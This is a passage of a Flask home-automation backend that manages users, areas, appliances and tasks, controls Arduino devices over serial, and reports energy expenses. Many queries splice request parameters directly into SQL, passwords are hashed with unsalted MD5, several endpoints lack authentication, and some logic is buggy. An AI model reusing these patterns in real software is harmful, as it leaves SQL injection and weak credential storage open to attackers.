return redirect(url_for('login'))
user_id = request.args.get('userId')
d = collections.OrderedDict()
query="select * from user u inner join role r on r.id=u.role_id where u.id = '{id}' ".format(id=user_id)
conn = engine.connect()
rows=conn.execute(query)
conn.close()
#rows=cursor.fetchall()
#print(row)
user = collections.OrderedDict()
for row in rows:
user['id'] = row[0]
user['name'] = row[1]
user['lastname'] = row[2]
user['user'] = row[3]
user['password'] = row[4]
user['mail'] = str(row[5]) #datetime.strftime("%Y-%m-%d %H:%M:%S")
#d['creation_date'] = row[6].strftime("%Y-%m-%d %H:%M:%S")
user['birthdate'] = str(row[6])
user['status'] = row[8]
user['phone'] = row[9]
#objects_list.append(d)
#role = collections.OrderedDict()
#role['id'] = row[12]
#role['name'] = row[13]
user['roleId'] = row[11]
user['roleName'] = row[12]
return render_template('user_edit.html',user=user,userLogged=session.get('userLogged'))
@app.route("/user_edit", methods=['POST'])
def userSubmitEdit():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
id=request.form['user-id']
name=request.form['name']
lastName=request.form['last-name']
user=request.form['user']
password=request.form['password']
phone=request.form['phone']
email=request.form['email']
roleId=request.form['user-role']
birthDate=request.form['birthdate']
status=request.form['user-status']
passHash=hashlib.md5(password.encode())
convertedPass=passHash.hexdigest()
conn = engine.connect()
session.get('userLogged')
queryPass="select password from user where id = '{id}'".format(id=id)
rowPass=conn.execute(queryPass)
conn.close()
#rowPass=cursor.fetchall()
psw = ""
for row in rowPass:
psw = row[0]
updatePass = password
if psw != password:
updatePass = convertedPass
#query="insert user (id,name,lastname,user,password,mail,birth_date,creation_date,status,phone,role_id) values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"
conn = engine.connect()
data = conn.execute("""UPDATE user SET name=%s, lastname=%s, user=%s, password=%s, mail=%s, birth_date=%s, status=%s, phone=%s, role_id=%s WHERE id=%s""", (name, lastName, user, updatePass, email, birthDate, status, phone, roleId, id))
#data= cursor.execute(query,(id,name,lastName,user,password,email,birthDate,status,phone,roleId))
#conn.commit()
conn.close()
#conn.close
msg = collections.OrderedDict()
if data!=None:
msg['status'] = 1
msg['msg'] = "user successful edited"
else:
msg = collections.OrderedDict()
msg['status'] = 0
msg['msg'] = "error, user not edited"
res = JSON.dumps(msg)
return res
#=============== Area services =============
@app.route("/area_index")
def areaIndex():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
d = collections.OrderedDict()
query="select * from area"
objects_list = []
conn = engine.connect()
rows=conn.execute(query)
conn.close()
#rows=cursor.fetchall()
#print(row)
for row in rows:
area = collections.OrderedDict()
area['id'] = row[0]
area['name'] = row[1]
area['quantity'] = row[2]
area['creation_date'] = str(row[3])
area['status'] = row[4]
area['house_id'] = row[5]
objects_list.append(area)
return render_template('area_index.html',areas = objects_list,userLogged=session.get('userLogged'))
@app.route("/area_create",methods=['GET'])
def registerArea():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
return render_template('area_create.html',userLogged=session.get('userLogged'))
@app.route("/area_create", methods=['POST'])
def submitArea():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
name=request.form['name']
# quantity=request.form['quantity']
status=request.form['area-status-radio']
#description=request.form['description']
creationDate=time.strftime("%Y-%m-%d");
house_id=1;
query="insert into area (name,creation_date,status,house_id) values (%s,%s,%s,%s)"
conn = engine.connect()
data= conn.execute(query,(name,creationDate,status,house_id))
#conn.commit()
conn.close
msg = collections.OrderedDict()
if data !=None:
msg['status'] = 1
msg['msg'] = "user successful edited"
else:
msg = collections.OrderedDict()
msg['status'] = 0
msg['msg'] = "error, user not edited"
res = JSON.dumps(msg)
return res
@app.route("/area_edit",methods=['GET'])
def areaEdit():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
area_id = request.args.get('areaId')
d = collections.OrderedDict()
query="select * from area a where a.id = '{id}' ".format(id=area_id)
conn = engine.connect()
rows=conn.execute(query)
#rows=cursor.fetchall()
area = collections.OrderedDict()
conn.close()
for row in rows:
area['id'] = row[0]
area['name'] = row[1]
# area['quantity'] = row[2]
area['status'] = row[4]
return render_template('area_edit.html',area=area,userLogged=session.get('userLogged'))
@app.route("/area_edit",methods=['POST'])
def areaSubmitEdit():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
id=request.form['area-id']
name=request.form['name']
# quantity=request.form['quantity']
status=request.form['area-active-radio']
conn = engine.connect()
data = conn.execute("""UPDATE area SET name=%s, status=%s WHERE id=%s""", (name, status, id))
#conn.commit()
conn.close
msg = collections.OrderedDict()
if data != None:
msg['status'] = 1
msg['msg'] = "user successful edited"
else:
msg = collections.OrderedDict()
msg['status'] = 0
msg['msg'] = "error, user not edited"
res = JSON.dumps(msg)
return res
#================= Appliance services ===============
@app.route("/appliance_index")
def applianceIndex():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
d = collections.OrderedDict()
query="select ap.id, ap.name, ap.power, ap.fee, ap.description, ap.status, ap.creation_date, s.name, a.name, apt.name from appliance ap inner join sensor s on ap.sensor_id=s.id inner join area a on ap.area_id=a.id inner join appliance_type apt on ap.appliance_type_id=apt.id;"
objects_list = []
conn = engine.connect()
rows=conn.execute(query)
#rows=cursor.fetchall()
#print(row)
conn.close()
for row in rows:
appliance = collections.OrderedDict()
appliance['id'] = row[0]
appliance['name'] = row[1]
appliance['power'] = row[2]
appliance['fee'] = row[3]
appliance['description'] = row[4]
appliance['status'] = row[5]
appliance['creation_date'] = str(row[6])
appliance['sensor'] = row[7]
appliance['area'] = row[8]
appliance['type'] = row[9]
objects_list.append(appliance)
return render_template('appliance_index.html',appliances=objects_list,userLogged=session.get('userLogged'))
@app.route("/appliance_create",methods=['GET'])
def registerAppliance():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
#cursor= conn.cursor()
queryArea="select * from area"
area_list = []
conn = engine.connect()
area_rows=conn.execute(queryArea)
#area_rows=cursor.fetchall()
for row in area_rows:
area = collections.OrderedDict()
area['id'] = row[0]
area['name'] = row[1]
area_list.append(area)
conn.close()
conn = engine.connect()
queryApplianceType="select * from appliance_type"
appliance_type_list = []
appliance_type_rows=conn.execute(queryApplianceType)
#appliance_type_rows=cursor.fetchall()
for row in appliance_type_rows:
appliance_type = collections.OrderedDict()
appliance_type['id'] = row[0]
appliance_type['name'] = row[1]
appliance_type_list.append(appliance_type)
conn.close()
conn = engine.connect()
querySensor="select * from sensor"
sensor_list = []
sensor_rows=conn.execute(querySensor)
#sensor_rows=cursor.fetchall()
for row in sensor_rows:
sensor = collections.OrderedDict()
sensor['id'] = row[0]
sensor['name'] = row[1] + ", " + row[2]
sensor_list.append(sensor)
conn.close()
#cursor= conn.cursor()
return render_template('appliance_create.html',areas=area_list,sensors=sensor_list,appliance_types=appliance_type_list,userLogged=session.get('userLogged'))
@app.route("/appliance_create",methods=['POST'])
def submitAppliance():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
name=request.form['name']
power=request.form['power']
# fee=request.form['fee']
status=request.form['appliance-status-radio']
description=request.form['description']
creationDate=time.strftime("%Y-%m-%d")
sensor_id=request.form['sensor']
area_id=request.form['area']#4;
appliance_type_id=request.form['type-appliance']#1;
conn = engine.connect()
query="insert into appliance (name,power,description,status,creation_date,sensor_id,area_id,appliance_type_id) values (%s,%s,%s,%s,%s,%s,%s,%s)"
data= conn.execute(query,(name,power,description,status,creationDate,sensor_id,area_id,appliance_type_id))
#conn.commit()
conn.close()
conn = engine.connect()
queryApplianceQuantity = "select a.appliance_quantity from area a inner join appliance ap on a.id = ap.area_id where ap.area_id = '{id}' ".format(id=area_id)
print(queryApplianceQuantity)
applianceQuantity = conn.execute(queryApplianceQuantity)
conn.close()
conn = engine.connect()
newQuantity = applianceQuantity + 1
print(newQuantity)
dataUpdateArea = conn.execute("""UPDATE area SET appliance_quantity=%s WHERE id=%s""", (newQuantity, area_id))
print(dataUpdateArea)
#conn.commit()
conn.close()
#conn.close
msg = collections.OrderedDict()
if data !=None:
msg['status'] = 1
msg['msg'] = "user successful edited"
else:
msg = collections.OrderedDict()
msg['status'] = 0
msg['msg'] = "error, user not edited"
res = JSON.dumps(msg)
return res
@app.route("/appliance_edit",methods=['GET'])
def applianceEdit():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
appliance_id = request.args.get('applianceId')
conn = engine.connect()
query="select ap.id, ap.name, ap.power, ap.fee, ap.description, ap.status, ap.creation_date, s.id, a.id, apt.id from appliance ap inner join sensor s on ap.sensor_id=s.id inner join area a on ap.area_id=a.id inner join appliance_type apt on ap.appliance_type_id=apt.id where ap.id = '{id}'; ".format(id=appliance_id)
appliance_rows=conn.execute(query)
conn.close()
appliance = collections.OrderedDict()
print(appliance_rows)
for row in appliance_rows:
appliance['id'] = row[0]
appliance['name'] = row[1]
appliance['power'] = row[2]
# appliance['fee'] = row[3] no editable
appliance['description'] = row[4]
appliance['status'] = row[5]
appliance['creation_date'] = str(row[6])
appliance['sensorId'] = row[7]
appliance['areaId'] = row[8]
appliance['typeId'] = row[9]
#cursor.close()
conn = engine.connect()
queryArea="select * from area"
area_list = []
area_rows=conn.execute(queryArea)
#area_rows=cursor.fetchall()
for row in area_rows:
area = collections.OrderedDict()
area['id'] = row[0]
area['name'] = row[1]
area_list.append(area)
conn.close()
conn = engine.connect()
queryApplianceType="select * from appliance_type"
appliance_type_list = []
appliance_type_rows=conn.execute(queryApplianceType)
#appliance_type_rows=cursor.fetchall()
for row in appliance_type_rows:
appliance_type = collections.OrderedDict()
appliance_type['id'] = row[0]
appliance_type['name'] = row[1]
appliance_type_list.append(appliance_type)
conn.close()
conn = engine.connect()
querySensor="select * from sensor"
sensor_list = []
sensor_rows=conn.execute(querySensor)
#sensor_rows=cursor.fetchall()
for row in sensor_rows:
sensor = collections.OrderedDict()
sensor['id'] = row[0]
sensor['name'] = row[1] + ", " + row[2]
sensor_list.append(sensor)
conn.close()
#cursor= conn.cursor()
return render_template('appliance_edit.html',appliance=appliance,areas=area_list,sensors=sensor_list,appliance_types=appliance_type_list,userLogged=session.get('userLogged'))
@app.route("/appliance_edit",methods=['POST'])
def submitApplianceEdit():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
print("if Session")
print(session)
return redirect(url_for('login'))
id=request.form['appliance-id']
name=request.form['name']
power=request.form['power']
# fee=request.form['fee'] no es editable
status=request.form['appliance-status-radio']
description=request.form['description']
#creationDate=time.strftime("%Y-%m-%d")
sensor_id=request.form['sensor']
area_id=request.form['area']#4;
appliance_type_id=request.form['type-appliance']#1;
#Obtener area_id para comparar si se edito o no el area y asi modificar el appliance_quantity, en las areas involucradas
conn = engine.connect()
queryCurrentAreaId = "select ap.area_id from appliance ap where ap.id = '{id}' ".format(id=id)
currentAreaId = 0
currentArea_rows=conn.execute(queryCurrentAreaId)
#currentArea_rows=cursor.fetchall()
print(currentArea_rows)
for row in currentArea_rows:
currentAreaId = row[0]
conn.close()
# print(currentAreaId)
#updateAppQuantity = False
conn = engine.connect()
data = conn.execute("""UPDATE appliance SET name=%s, power=%s, status=%s, description=%s, sensor_id=%s, area_id=%s, appliance_type_id=%s WHERE id=%s""", (name, power, status, description, sensor_id, area_id, appliance_type_id, id))
conn.close()
# print(area_id)
#Entra cuando no deberia
if (str(currentAreaId) != area_id):
#Obtener appliance quantity para sumar en areas.
conn = engine.connect()
queryApplianceQuantitySumar = "select a.appliance_quantity from area a inner join appliance ap on a.id = ap.area_id where ap.area_id = '{id}' ".format(id=area_id)
applianceQuantitySumar = 0
quantitySuma_rows=conn.execute(queryApplianceQuantitySumar)
#quantitySuma_rows=cursor.fetchall()
for row in quantitySuma_rows:
applianceQuantitySumar = row[0]
print(applianceQuantitySumar)
conn.close()
#Se actualiza el valor de appliance_quantity en area al que se agrega.
conn = engine.connect()
newQuantitySumar = applianceQuantitySumar + 1
print("quantity suma: ")
print(newQuantitySumar)
dataUpdateAreaSuma = conn.execute("""UPDATE area SET appliance_quantity=%s WHERE id=%s""", (newQuantitySumar, area_id))
print(dataUpdateAreaSuma)
conn.close()
#Obtener appliance quantity para restar en areas.
conn = engine.connect()
queryApplianceQuantityRestar = "select a.appliance_quantity from area a inner join appliance ap on a.id = ap.area_id where ap.area_id = '{id}' ".format(id=currentAreaId)
applianceQuantityRestar = 0
quantityResta_rows=conn.execute(queryApplianceQuantityRestar)
#quantityResta_rows=conn.fetchall()
for row in quantityResta_rows:
applianceQuantityRestar = row[0]
print(applianceQuantityRestar)
conn.close()
#Se actualiza el valor de appliance_quantity en el area del que se quita.
conn = engine.connect()
newQuantityRestar = applianceQuantityRestar - 1
print("quantity resta: ")
print(newQuantityRestar)
dataUpdateAreaResta = conn.execute("""UPDATE area SET appliance_quantity=%s WHERE id=%s""", (newQuantityRestar, currentAreaId))
conn.close()
# conn.commit()
#cursor.close()
msg = collections.OrderedDict()
if data == 1:
msg['status'] = 1
msg['msg'] = "user successful edited"
else:
msg = collections.OrderedDict()
msg['status'] = 0
msg['msg'] = "error, user not edited"
res = JSON.dumps(msg)
return res
#Funcion para validar role admin y familia del usuario.
def isRoleValid(userRole):
query = "select code from role where code = '{admin}' or code='{family}'".format(admin='A',family='F')
conn = engine.connect()
codeRow=conn.execute(query)
#codeRow = cursor.fetchall()
role = False
userCodeRole = ""
for code in codeRow:
if userRole == code[0]:
role = True
break
# userCodeRole = code[0]
conn.close()
return role
#Funcion para validar role admin del usuario.
def isRoleAdmin():
userRole = session.get('userRole')
query = "select code from role where code = '{admin}'".format(admin='A')
conn = engine.connect()
codeRow=conn.execute(query)
#codeRow = cursor.fetchall()
print(codeRow)
roleAdmin = ""
for code in codeRow:
roleAdmin = code[0]
conn.close()
if roleAdmin == userRole:
return True
else:
return False
#========= Tasks services ===========
@app.route("/task_index")
def taskIndex():
userRole = session.get('userRole')
userCodeRole = isRoleValid(userRole)
print(userRole)
if session.get('logged_in') != True or userCodeRole == False:
print("if Session")
print(session)
return redirect(url_for('login'))
areasList = getActiveAreas()
# cursor = conn.cursor()
# query = "select * from task"
# cursor.execute(query)
# cursor.close()
# rows = cursor.fetchall()
# objects_list = []
# for row in rows:
# d = collections.OrderedDict()
# d['id'] = row[0]
# d['name'] = row[1]
# d['description'] = row[2]
# d['creationDate'] = str(row[3])
# d['time'] = str(row[4])
# d['status'] = row[5]
# objects_list.append(d)
# cursor.close()
#conn.commit()
#print(objects_list)
#conn.close
if areasList != None:
return render_template('task_index.html',areas= areasList,userLogged=session.get('userLogged'))
else:
return render_template('task_index.html',"lista vacia")
#API
@app.route("/arduino/lights", methods=['GET'])
def arduinoLights():
status_light="error"
action = request.args.get('action')
appliance_id = request.args.get('appliance_id')
transactionId = 0
json = collections.OrderedDict()
status=0
if action=='status':
print("status")
ser.write('status')
status_light=ser.readline()
#while True:
print(status_light)
if action=='light_on_l1':
print("light_on lamp 1")
ser.write('LIGHT_ON_L1')
status_light='light_on_l1'
if action=='light_off_l1':
print('light_off lamp 1')
ser.write('LIGHT_OFF_L1')
status_light='light_off_l1'
if action=='light_on_l2':
print("light_on lamp 2")
ser.write('LIGHT_ON_L2')
status_light='light_on_l2'
if action=='light_off_l2':
print('light_off lamp 2')
ser.write('LIGHT_OFF_L2')
status_light='light_off_l2'
conn = engine.connect()
rows=conn.execute("select id from transaction where appliance_id = {appliance_id} and status = {status}".format(appliance_id=appliance_id,status=status))
#rows = cursor.fetchall()#verifica si la luz esta encendida
conn.close()
for row in rows:
transactionId=row[0]
if transactionId!=0:#si la luz ya esta encendida y action es light_off actualiza el estado a apagado
if action=='light_off_l1' or action=='light_off_l2':
conn = engine.connect()
conn.execute("""UPDATE transaction SET datetime_off=%s,status=%s WHERE id = %s""", (time.strftime("%Y-%m-%d %I:%M:%S"),1,transactionId))
#conn.commit()
conn.close()
else:
if action=='light_on_l1' or action=='light_on_l2':#inserta solo si action es encender luz
conn = engine.connect()
query="insert into transaction ( name , datetime_on , status , appliance_id,datetime_off ) values (%s,%s,%s,%s,%s)"
data= conn.execute(query,("lampara", time.strftime("%Y-%m-%d %I:%M:%S"),0, appliance_id,None))
#conn.commit()
conn.close()
if status_light=='light_on_l1' or status_light=='light_off_l1' or status_light=='light_on_l2'or status_light=='light_off_l2':
json["status"] = 1
json["msg"] = status_light
return jsonify(json)
@app.route("/getCurrentMonthExpense", methods=['GET'])
def getCurrentMonthExpense():
conn = engine.connect()
query="select (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee as expense from transaction t inner join appliance a on t.appliance_id=a.id where month(datetime_off)=month(now()) and year(datetime_off)=year(now())"
data= conn.execute(query)
#rows = cursor.fetchall()
json = collections.OrderedDict()
totalExpense=0
for row in data:
totalExpense+=row[0]
json["msg"] = "ok"
json["status"] = 1
json["totalExpense"] = int(totalExpense)
conn.close()
return JSON.dumps(json)
@app.route("/get_expense_by_area", methods=['POST'])
def getExpenseByArea():
conn = engine.connect()
start_date = request.form['start_date']
end_date = request.form['end_date']
area_id = request.form['area_id']
json = collections.OrderedDict()
query="select areaExpense('"+start_date+"','"+end_date+"',"+area_id+")"
rows= conn.execute(query)
#rows = cursor.fetchall()
for row in rows:
json["status"] = 1
json["result"] = row[0]
conn.close()
return jsonify(json)
@app.route("/get_expense_by_appliance", methods=['POST'])
def getExpenseByAppliance():
conn = engine.connect()
start_date = request.form['start_date']
end_date = request.form['end_date']
appliance_id = request.form['appliance_id']
json = collections.OrderedDict()
query="select applianceExpense('"+start_date+"','"+end_date+"',"+appliance_id+")"
rows= conn.execute(query)
#rows = cursor.fetchall()
for row in rows:
json["status"] = 1
json["result"] = row[0]
conn.close()
return jsonify(json)
@app.route("/get_total_expense", methods=['POST'])
def getTotalExpense():
conn = engine.connect()
start_date = request.form['start_date']
end_date = request.form['end_date']
json = collections.OrderedDict()
print(end_date)
print(start_date)
query="select totalExpense('"+start_date+":00:00','"+end_date+":23:59')"
rows= conn.execute(query)
#rows = cursor.fetchall()
for row in rows:
json["status"] = 1
json["result"] = row[0]
conn.close()
return jsonify(json)
@app.route("/get_monthly_expense_by_area", methods=['GET'])
def get_monthly_expense_by_area():
conn = engine.connect()
status=1
msg='succcess'
month_num = request.args.get('month')
if (month_num==None or month_num.strip()==""):
query="select sum(TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee as expense,ar.name as area_name from transaction t inner join appliance a on t.appliance_id=a.id inner join area ar on ar.id=a.area_id where month(datetime_off)=month(now()) and year(datetime_off)=year(now()) group by ar.name;"
else:
query="select sum(TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee as expense,ar.name as area_name from transaction t inner join appliance a on t.appliance_id=a.id inner join area ar on ar.id=a.area_id where month(datetime_off)="+month_num+" and year(datetime_off)=year(now()) group by ar.name;"
json = collections.OrderedDict()
obj = collections.OrderedDict()
rows= conn.execute(query)
#rows = cursor.fetchall()
expense_list = []
for row in rows:
obj = collections.OrderedDict()
obj["expense"] = row[0]
obj["area_name"] = row[1]
expense_list.append(obj)
conn.close()
json['status']=status
json['msg']=msg
json['expense_list']=expense_list
return jsonify(json)
@app.route("/get_monthly_expense_by_appliance", methods=['GET'])
def get_monthly_expense_by_appliance():
conn = engine.connect()
month_num = request.args.get('month')
if (month_num==None or month_num.strip()==""):
month_num="month(now())"
json = collections.OrderedDict()
query="select sum(TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee as expense,a.name as area_name from transaction t inner join appliance a on t.appliance_id=a.id where month(datetime_off)="+month_num+" group by a.name;"
rows= conn.execute(query)
#rows = cursor.fetchall()
server_list = []
for row in rows:
json = collections.OrderedDict()
json["expense"] = row[0]
json["appliance_name"] = row[1]
server_list.append(json)
conn.close()
return JSON.dumps(server_list)
@app.route("/get_monthly_expenses", methods=['GET'])
def get_monthly_expenses():
conn = engine.connect()
year = request.args.get('year')
if year == None or year =="":
year="year(now())"
json = collections.OrderedDict()
query="""select IFNULL(sum(case when month(datetime_off)=1 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Enero,
IFNULL(sum(case when month(datetime_off)=2 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Febrero,
IFNULL(sum(case when month(datetime_off)=3 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Marzo,
IFNULL(sum(case when month(datetime_off)=4 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Abril,
IFNULL(sum(case when month(datetime_off)=5 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Mayo,
IFNULL(sum(case when month(datetime_off)=6 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Junio,
IFNULL(sum(case when month(datetime_off)=7 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Julio,
IFNULL(sum(case when month(datetime_off)=8 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Agosto,
IFNULL(sum(case when month(datetime_off)=9 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Septiembre,
IFNULL(sum(case when month(datetime_off)=10 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Octubre,
IFNULL(sum(case when month(datetime_off)=11 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Noviembre,
IFNULL(sum(case when month(datetime_off)=12 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Diciembre
from transaction t inner join appliance a on t.appliance_id=a.id where EXTRACT(YEAR FROM datetime_off)="""+year
rows= conn.execute(query)
#rows = cursor.fetchall()
server_list = []
for row in rows:
json = collections.OrderedDict()
json["month"] = "Enero"
json["expense"] = row[0]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Febrero"
json["expense"] = row[1]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Marzo"
json["expense"] = row[2]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Abril"
json["expense"] = row[3]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Mayo"
json["expense"] = row[4]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Junio"
json["expense"] = row[5]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Julio"
json["expense"] = row[6]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Agosto"
json["expense"] = row[7]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Septiembre"
json["expense"] = row[8]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Octubre"
json["expense"] = row[9]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Noviembre"
json["expense"] = row[10]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Diciembre"
json["expense"] = row[11]
server_list.append(json)
conn.close()
return JSON.dumps(server_list)
@app.route("/get_all_expenses", methods=['GET'])
def get_all_expenses():
conn = engine.connect()
json = collections.OrderedDict()
query="""select datetime_on,datetime_off, (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee as expense,a.name,ar.name,
CONCAT( MOD(HOUR(TIMEDIFF(datetime_on,datetime_off)), 24), ':',
MINUTE(TIMEDIFF(datetime_on, datetime_off)), ':',
SECOND(TIMEDIFF(datetime_on, datetime_off)), '')
AS TimeDiff
from transaction t inner join appliance a on t.appliance_id=a.id inner join area ar on ar.id=a.area_id order by t.datetime_on"""
rows= conn.execute(query)
#rows = cursor.fetchall()
server_list = []
for row in rows:
json = collections.OrderedDict()
json["datetime_on"] = str(row[0])
json["datetime_off"] = str(row[1])
json["expense"] = row[2]
json["appliance_name"] = row[3]
json["area_name"] = row[4]
json["duration"] = str(row[5])
server_list.append(json)
conn.close()
return JSON.dumps(server_list)
@app.route("/task_create", methods=['POST'])
def createTask():
# print("create")
# userRole = session.get('userRole')
# userCodeRole = isRoleValid(userRole)
# if session.get('logged_in') != True or userCodeRole == False:
# print("if Session")
# print(session)
# return redirect(url_for('dashboard'))
description=request.form['name']
timeTask=request.form['time-task']
action=request.form['action']
area=request.form['area-id']
global appliance_task
appliance_task=request.form.get('appliance-id', type=int)
conn = engine.connect()
query="insert into task ( name , description ,create_date,time, status,task_type_id,area_id,appliance_id) values (%s,%s,%s,%s,%s,%s,%s,%s)"
data= conn.execute(query,(action,description, time.strftime("%Y-%m-%d"),timeTask , 1,1,area,appliance_task))
#conn.commit()
conn.close()
msg = collections.OrderedDict()
if data != None:
print("creating task")
print(appliance_task)
msg['status'] = 1
msg['msg'] = "task successfully created"
time_lights_off=timeTask
if action=="task_light_off":
task_lights_off=True
th2=threading.Thread(target=daemon3) #apagado
th2.daemon = True
th2.start()
else:
task_lights_on=True
th3=threading.Thread(target=daemon2) #encendido
th3.daemon = True
th3.start()
else:
msg = collections.OrderedDict()
msg['status'] = 0
msg['msg'] = "error, task not created"
res = JSON.dumps(msg)
return res
@app.route("/task_light_off", methods=['GET'])
def task_light_off():
response="error"
task_hour= request.args.get('task_hour')
conn = engine.connect()
query="insert into task ( name , description ,create_date,time, status,task_type_id) values (%s,%s,%s,%s,%s,%s)"
data= conn.execute(query,("task_light_off","tarea apagar luz", time.strftime("%Y-%m-%d"),task_hour , 1,1))
#conn.commit()
conn.close()
if data !=None:
response="success"
task_lights_off=True
time_lights_off=task_hour
th=threading.Thread(target=daemon3)
th.daemon = True
th.start()
return response
@app.route("/arduino/temperature", methods=['GET'])
def getTemperatura():
json = collections.OrderedDict()
obj = collections.OrderedDict()
msg='success'
status=0
ser_data=""
temperatura="0"
try:
ser.write("TEMPERATURA")
time.sleep(1)
ser_data=ser.readline()
status=1
if len(ser_data) == 0 or ser_data.strip().isdigit()==False:
msg="error temp serial"
else:
temperatura=ser_data
except Exception as e:
print(e)
temperatura="0"
msg="error temperature"
json["status"] = status
json["msg"] = msg
obj['value'] = temperatura
json["temperature"] = obj
print("temp: "+temperatura)
return JSON.dumps(json)
@app.route("/arduino/humidity", methods=['GET'])
def getHumedad():
json = collections.OrderedDict()
obj = collections.OrderedDict()
msg='success'
status=0
ser.write("HUMEDAD")
humedad=""
try:
ser_data=ser.readline()
humedad=ser_data
status=1
if len(ser_data) == 0 or humedad.strip().isdigit()==False:
humedad="0"
except Exception as e:
print(e)
humedad="0"
msg="error humidity"
json["status"] = status
json["msg"] = msg
obj['value'] = humedad
json["humidity"] = obj
return JSON.dumps(json)
@app.route("/arduino/alarm_status", methods=['GET'])
def getAlarmStatus():
alarm_status="0"
conn = engine.connect()
rows=conn.execute("select status from sensor where id = 7 ")
#rows = cursor.fetchall()
conn.close()
for row in rows:
alarm_status=str(row[0])
return alarm_status
@app.route("/arduino/alarm", methods=['GET'])
def arduinoAlarm():
action = request.args.get('action')
json = collections.OrderedDict()
msg='success '+action
status=1
try:
func, args = {
'alarm_mov_on': (changeAlarmStatus,('ALARM_MOV_ON',1,7,)),
'alarm_gas_on': (changeAlarmStatus,('ALARM_GAS_ON',1,8,)),
'alarm_gas_off': (changeAlarmStatus,('ALARM_GAS_OFF',0,8,))
}.get(action, (changeAlarmStatus,('ALARM_MOV_OFF',0,7,)))
result = func(*args)
ser=serial.Serial('/dev/ttyACM0',9600,timeout=2)
except:
print "serial not connected"
msg='error'
status=0
if action=='alarm_mov_on':
daemon_alarm_actived=True
th1=threading.Thread(target=daemon)
th1.daemon = True
th1.start()
os.system('./texto_a_voz.sh '+ 'Alarma, activada')
if action=='alarm_gas_on':
daemon_alarm_actived=True
th1=threading.Thread(target=daemon)
th1.daemon = True
th1.start()
os.system('./texto_a_voz.sh '+ 'Alarma, activada')
json["status"] = status
json["msg"] = msg
return jsonify(json)
@app.route("/arduino/lock", methods=['GET'])
def arduinoLock():
action = request.args.get('action')
json = collections.OrderedDict()
msg='success '+action
status=0
try:
print(action.upper())
ser.write(str(action).strip().upper())
time.sleep(1)
ser_data=ser.readline()
if len(ser_data)>0:
status=1
except:
msg='error'
status=0
json["status"] = status
json["msg"] = msg
return jsonify(json)
def daemon():
while True:
sensor_id=0
ser_data=ser.readline()
if len(ser_data) > 0:
if ser_data.strip() == "HAY MOVIMIENTO":
sendTelegramMessage("🚨 Alerta ⚠, Posible Intruso detectado❗🔓🤔😬😨",1)
sensor_id=7
if ser_data.strip() == "FUGA_GAS":
sendTelegramMessage("🚨 Alerta ⚠, Posible Fuga de Gas❗🔓🤔😬😨",2)
sensor_i=8
if sensor_id != 0:
conn = engine.connect()
conn.execute("""UPDATE sensor SET status=%s WHERE id = %s""", (0,sensor_id))
#conn.commit()
conn.close()
sensor_id=0
break
def daemon2():
print("running task lights on")
print(appliance_task)
conn = engine.connect()
query="select time from task where name=%s and appliance_id=%s and status =%s order by time desc limit 1"
rows= conn.execute(query,('task_light_on',appliance_task,1))
conn.close()
#rows = cursor.fetchall()
light_status="off"
task_lights_on=False
for row in rows:
task_lights_on=True
time_lights_on = row[0]
